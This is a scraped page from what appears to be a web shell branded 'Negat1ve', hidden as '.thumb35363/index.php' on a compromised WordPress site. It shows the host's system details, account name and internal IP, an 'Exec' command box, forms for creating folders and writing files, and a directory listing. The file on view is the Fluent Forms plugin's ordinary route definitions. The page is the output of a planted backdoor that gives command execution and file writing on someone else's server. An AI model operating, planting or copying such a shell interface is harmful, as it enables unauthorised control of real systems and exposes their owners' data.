Linux webm017.cluster127.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue Sep 17 08:14:20 UTC 2024 x86_64
Apache
10.127.20.17
/
home
/
m
/
a
/
t
/
matisecojj
/
www
/
wp-content
/
plugins
/
fluentform
/
app
/
Http
/
Routes
[ HOME ]
Exec
Submit
api.php
<?php /** * @var $router \FluentForm\Framework\Http\Router */ /* * Forms resource */ $router->prefix('forms')->withPolicy('FormPolicy')->group(function ($router) { $router->get('/', 'FormController@index'); $router->post('/', 'FormController@store'); $router->get('templates', 'FormController@templates'); $router->get('ping', 'FormController@ping'); $router->prefix('{form_id}')->group(function ($router) { $router->get('/', 'FormController@find'); $router->post('/', 'FormController@update'); $router->delete('/', 'FormController@delete'); $router->post('duplicate', 'FormController@duplicate'); $router->post('convert', 'FormController@convert'); $router->get('resources', 'FormController@resources'); $router->get('pages', 'FormController@pages'); $router->get('fields', 'FormController@fields'); $router->get('shortcodes', 'FormController@shortcodes'); $router->get('findShortCodePage', 'FormController@findShortCodePage'); $router->get('editHistory', 'FormController@formEditHistory'); $router->post('clearHistory', 'FormController@clearEditHistory'); }); }); /* * Form Settings */ $router->prefix('settings')->withPolicy('FormPolicy')->group(function ($router) { $router->prefix('{form_id}')->group(function ($router) { $router->get('/', 'FormSettingsController@index'); $router->post('/', 'FormSettingsController@store'); $router->delete('/', 'FormSettingsController@remove'); $router->get('general', 'FormSettingsController@general'); $router->post('general', 'FormSettingsController@saveGeneral'); $router->get('customizer', 'FormSettingsController@customizer'); $router->post('customizer', 'FormSettingsController@storeCustomizer'); $router->post('entry-columns', 'FormSettingsController@storeEntryColumns'); $router->get('conversational-design', 'FormSettingsController@conversationalDesign'); $router->post('store-conversational-design', 'FormSettingsController@storeConversationalDesign'); $router->get('preset', 'FormSettingsController@getPreset'); $router->post('save-preset', 'FormSettingsController@savePreset'); }); }); /* * Form Submissions */ $router->prefix('submissions')->withPolicy('SubmissionPolicy')->group(function ($router) { $router->get('/', 'SubmissionController@index'); $router->get('resources', 'SubmissionController@resources'); $router->post('bulk-actions', 'SubmissionController@handleBulkActions'); $router->get('print', 'SubmissionController@print'); $router->get('all', 'SubmissionController@all'); $router->delete('/{entry_id}', 'SubmissionController@remove'); $router->prefix('{entry_id}')->group(function ($router) { $router->get('/', 'SubmissionController@find'); $router->post('status', 'SubmissionController@updateStatus'); $router->post('is-favorite', 'SubmissionController@toggleIsFavorite'); $router->get('logs', 'SubmissionLogController@get'); $router->delete('logs', 'SubmissionLogController@remove'); $router->get('notes', 'SubmissionNoteController@get'); $router->post('notes', 'SubmissionNoteController@store'); $router->get('submission-users','SubmissionController@submissionUsers'); $router->post('update-submission-user','SubmissionController@updateSubmissionUser'); }); }); /* * Logs */ $router->prefix('logs')->withPolicy('SubmissionPolicy')->group(function ($router) { $router->get('/', 'LogController@get'); $router->delete('/', 'LogController@remove'); $router->get('/filters', 'LogController@getFilters'); }); /* * Global Integrations */ $router->prefix('integrations')->withPolicy('FormPolicy')->group(function ($router) { $router->get('/', 'GlobalIntegrationController@index'); $router->post('/', 'GlobalIntegrationController@updateIntegration'); $router->post('update-status', 'GlobalIntegrationController@updateModuleStatus'); /* * Form Integrations */ $router->prefix('{form_id}')->group(function ($router) { $router->get('/form-integrations', 'FormIntegrationController@index'); $router->get('/', 'FormIntegrationController@find'); $router->post('/', 'FormIntegrationController@update'); $router->delete('/', 'FormIntegrationController@delete'); $router->get('/integration-list-id', 'FormIntegrationController@integrationListComponent'); }); }); /* * Global Settings */ $router->prefix('global-settings')->withPolicy('GlobalSettingsPolicy')->group(function ($router) { $router->get('/', 'GlobalSettingsController@index'); $router->post('/', 'GlobalSettingsController@store'); }); /* * Permission Roles */ $router->prefix('roles')->withPolicy('RoleManagerPolicy')->group(function ($router) { $router->get('/', 'RolesController@index'); $router->post('/', 'RolesController@addCapability'); }); /* * Permission Managers */ $router->prefix('managers')->withPolicy('RoleManagerPolicy')->group(function ($router) { $router->get('/', 'ManagersController@index'); $router->post('/', 'ManagersController@addManager'); $router->delete('/', 'ManagersController@removeManager'); $router->get('users', 'ManagersController@getUsers'); }); /* * Form Analytics */ $router->prefix('analytics')->withPolicy('FormPolicy')->group(function ($router) { $router->post('/{form_id}/reset', 'AnalyticsController@reset'); }); /* * Form Submission Handler */ $router->post('form-submit', 'SubmissionHandlerController@submit')->withPolicy('SubmissionPolicy'); /* * Form Report */ $router->prefix('report')->withPolicy('ReportPolicy')->group(function ($router) { // Component-specific endpoints $router->get('/overview-chart', 'ReportController@getOverviewChart'); $router->get('/revenue-chart', 'ReportController@getRevenueChart'); $router->get('/completion-rate', 'ReportController@getCompletionRate'); $router->get('/form-stats', 'ReportController@getFormStats'); $router->get('/heatmap-data', 'ReportController@getHeatmapData'); $router->get('/country-heatmap', 'ReportController@getCountryHeatmap'); $router->get('/api-logs', 'ReportController@getApiLogs'); $router->get('/top-performing-forms', 'ReportController@getTopPerformingForms'); $router->get('/subscriptions', 'ReportController@getSubscriptions'); $router->get('/payment-types', 'ReportController@getPaymentTypes'); // Existing endpoints $router->get('/select-forms', 'ReportController@getFormsDropdown'); $router->get('/net-revenue', 'ReportController@netRevenue'); $router->get('/submissions-analysis', 'ReportController@submissionsAnalysis'); $router->post('/submissions', 'ReportController@submissions'); $router->get('/forms/{form_id}', 'ReportController@form'); }); /* * Review Query */ $router->post('notice', 'AdminNoticeController@noticeActions')->withPolicy('FormPolicy'); /* * Global Query */ $router->get('global-search', 'GlobalSearchController@index')->withPolicy('FormPolicy');
Submit
Copy
Back
Folder Name
Submit
File Name
File Content
Submit
System Information
Uname > Linux webm017.cluster127.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue Sep 17 08:14:20 UTC 2024 x86_64 Software > Apache PHP > 8.1.33 Protocol > HTTP/1.1 IP / Port > 10.127.20.17 / 443 Mail > ON Curl > ON Owner > matisecojj MySQL > OFF Disable Function > _dyuweyrj4,_dyuweyrj4r,dl
*ReClick For Close
File : Negat1ve /JFR/.thumb35363/index.php
Name
Type
Size
Owner/Group
Permission
Last Modified
Actions
.
dir
-
matisecojj/users
0755
2026-01-15 06:43:51
..
dir
-
matisecojj/users
0755
2026-01-15 06:43:51
api.php
text/x-php
6.99 KB
matisecojj/users
0644
2026-01-15 06:43:51
© Negat1ve